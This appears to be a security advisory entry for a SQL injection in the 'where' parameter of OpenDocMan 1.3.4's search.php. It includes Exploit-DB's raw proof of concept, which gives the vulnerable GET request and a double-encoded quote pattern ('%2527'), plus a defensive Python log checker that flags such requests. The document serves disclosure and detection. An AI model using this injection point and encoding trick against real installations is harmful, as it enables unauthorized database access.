Vendor: OpenDocMan
By: Mehmet EMIROGLU
CVSS: 7.5 (HIGH)
CWE: 89 (SQL Injection)
Product Name: OpenDocMan
Affected Version From: 1.3.2004
Affected Version To: 1.3.2004
Patch Exists: NO
Related CWE:
CPE: a:opendocman:opendocman:1.3.4
Metasploit:
Other Scripts:
Platforms Tested: Wamp64, @Win
2019

OpenDocMan 1.3.4 – ‘where’ SQL Injection

This exploit allows an attacker to inject SQL code in the 'where' parameter of the search.php page in OpenDocMan 1.3.4, which can lead to unauthorized access or manipulation of the database.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize and validate user input before using it in SQL queries, and to use prepared statements or parameterized queries.

Exploit-DB raw data:

===========================================================================================
# Exploit Title: OpenDocMan 1.3.4 - ’where’ SQL Injection
# CVE: N/A
# Date: 05/03/2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: https://sourceforge.net/projects/opendocman/files/
# Software Link: https://sourceforge.net/projects/opendocman/files/
# Version: v1.3.4
# Category: Webapps
# Tested on: Wamp64, @Win
# Software description: OpenDocMan is a web based document management
#   system (DMS) written in PHP designed to comply with ISO 17025 and OIE
#   standard for document management. It features fine grained control of
#   access to files, and automated install and upgrades.
===========================================================================================
# POC - SQLi
# Parameters : where
# Attack Pattern : %2527
# GET Request :
http://localhost/opendocman/search.php?submit=submit&sort_by=id&where=[SQL Inject Here]&sort_order=asc&keyword=Training Manual&exact_phrase=on
===========================================================================================
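
The `%2527` pattern listed above is `%27` with its percent sign encoded again, that is, a single quote encoded twice, so a filter that decodes only once never sees the quote. The following is an added example (not part of the original advisory or of OpenDocMan) of flagging such requests in web access logs; the sample request targets are constructed, and the rule that a legitimate `where` value is a short alphanumeric token is an assumption.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Assumption: a legitimate `where` value is a short alphanumeric token.
SAFE_VALUE = re.compile(r"[A-Za-z0-9_]*")
MAX_ROUNDS = 5  # bound the decode loop so crafted input cannot spin it


def fully_decode(value):
    """Percent-decode until the value stops changing.

    Returns (final_value, extra_rounds), where extra_rounds counts decodes
    beyond the one the web server already performed.
    """
    rounds = 0
    while rounds < MAX_ROUNDS:
        decoded = unquote(value)
        if decoded == value:
            break
        value, rounds = decoded, rounds + 1
    return value, rounds


def inspect_request(target, param="where"):
    """Return a list of findings for `param` in one logged request target."""
    findings = []
    # parse_qsl applies the first decode, as the server does before the
    # application sees the parameter.
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        if name != param:
            continue
        final, extra = fully_decode(value)
        if extra:
            findings.append("multi-encoded")
        if not SAFE_VALUE.fullmatch(final):
            findings.append("unexpected-characters")
    return findings


# Constructed request targets, shaped like the GET request in the advisory.
BASE = ("/opendocman/search.php?submit=submit&sort_by=id&where={}"
        "&sort_order=asc&keyword=Training+Manual&exact_phrase=on")
SAMPLES = [BASE.format(v) for v in ("author", "%27", "%2527")]

if __name__ == "__main__":
    for target in SAMPLES:
        print(inspect_request(target) or ["ok"], target)
```

A `multi-encoded` finding on a parameter that never needs encoding is a strong signal on its own, independent of what the decoded value contains.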